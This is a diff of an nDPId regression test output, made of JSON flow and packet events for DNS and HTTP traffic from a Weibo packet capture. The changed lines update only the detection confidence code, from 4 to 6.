00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA6KCNAAEARjtXAqAFpwKgBAcjwADUAJqqk8RABAAABAAAAAAAAAWcGYWxpY2RuA2NvbQAAAQAB"} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"weibo.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":51440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"g.alicdn.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1463089073287,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073287,"pkt":"kDVu60UQeJKcD6iOCABFAAA8KCRAAEARjtLAqAFpwKgBAdDaADUAKHiskZsBAAABAAAAAAAAA2xvZwZtbXN0YXQDY29tAAABAAE="} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"weibo.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073287,"flow_last_seen":1463089073287,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073287,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53466,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Alibaba","breed":"Acceptable","category":"Web"},"dns": {"query":"log.mmstat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1463089073289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1463089073289,"pkt":"kDVu60UQeJKcD6iOCABFAAA+KCVAAEARjs\/AqAFpwKgBAYQeADUAKn2XkPcBAAABAAAAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAQ=="} 
-00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073289,"flow_last_seen":1463089073289,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1463089073289,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073319,"flow_last_seen":1463089073319,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073319,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1463089073319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073319,"pkt":"kDVu60UQeJKcD6iOCABFAAA8H8hAAEAGdDDAqAFpXbyG9oveAFCCZhY7AAAAAKACchAAKAAAAgQFtAQCCAoAQQnzAAAAAAEDAwc="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073321,"flow_last_seen":1463089073321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073321,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -104,38 +103,38 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1463089073334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073334,"pkt":"kDVu60UQeJKcD6iOCABFAAA8E7RAAEAGgETAqAFpXbyG9ovhAFAJpBpDAAAAAKACchB02wAAAgQFtAQCCAoAQQn3AAAAAAEDAwc="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073382,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi944y47WgmYWPKAS\/\/+aeQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073382,"pkt":"kDVu60UQeJKcD6iOCABFAAA0H8lAAEAGdDfAqAFpXbyG9oveAFCCZhY8OMuO14AQAOXIRAAAAQEICgBBCgMDdgyi"} 
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":285,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073319,"flow_last_seen":1463089073382,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1463089073382,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/global_nav\/WB_logo_b.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9\/6KbWaZXHbTaAS\/\/8KOQAAAgQFqAQCCAoDdgyiAEEJ8wEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA00sBAAEAGwT\/AqAFpXbyG9ovfAFBlcdtN+im1m4AQAOU4BAAAAQEICgBBCgMDdgyi"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073321,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":484,"flow_tot_l4_payload_len":484,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1463089073383,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/growth\/login\/sprite_login.png?13434210384389","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073383,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+DI1jKOKC1SpaAS\/\/+EggAAAgQFqAQCCAoDdgyjAEEJ9AEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1463089073383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073383,"pkt":"kDVu60UQeJKcD6iOCABFAAA0W1FAAEAGOK\/AqAFpXbyG9ovgAFAoLVKlyNYyj4AQAOWyTgAAAQEICgBBCgMDdgyj"} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073384,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi+Gi04d5CaQaRKAS\/\/+sgAAAAgQFqAQCCAoDdgyjAEEJ9wEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":292,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073384,"pkt":"kDVu60UQeJKcD6iOCABFAAA0E7VAAEAGgEvAqAFpXbyG9ovhAFAJpBpEotOHeoAQAOXaTwAAAQEICgBBCgMDdgyj"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":293,"source":"weibo.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073334,"flow_last_seen":1463089073384,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":473,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1463089073384,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35809,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/images\/common\/font\/wbficon.woff?id=201605111746","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1463089073393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":159,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":159,"pkt_l4_len":125,"thread_ts_msec":1463089073393,"pkt":"eJKcD6iOkDVu60UQCABFAACRAABAAEARtqHAqAEBwKgBaQA1RnMAfV+\/WFGBgAABAAMAAAAAAnUxA2ltZwZtb2JpbGUEc2luYQJjbgAAAQABwAwABQABAAAACQAZBWFkaW1nBGdzbGIIc2luYWVkZ2UDY29tAMAzAAUAAQAAAAoADQV3ZWlibwRncmlkwD7AWAABAAEAAAAvAATeSRxg"} 
-00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073393,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"u1.img.mobile.sina.cn","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"222.73.28.96"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA\/KDNAAEARjsDAqAFpwKgBAS4WADUAK\/dEyn0BAAABAAAAAAAAB2FjY291bnQFd2VpYm8DY29tAAABAAE="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"account.weibo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073394,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1463089073394,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073394,"pkt":"kDVu60UQeJKcD6iOCABFAAA8VdhAAEAGKCnAqAFp3kkcYKUjAFC1h1\/eAAAAAKACchBUFAAAAgQFtAQCCAoAQQoGAAAAAAEDAwc="} 
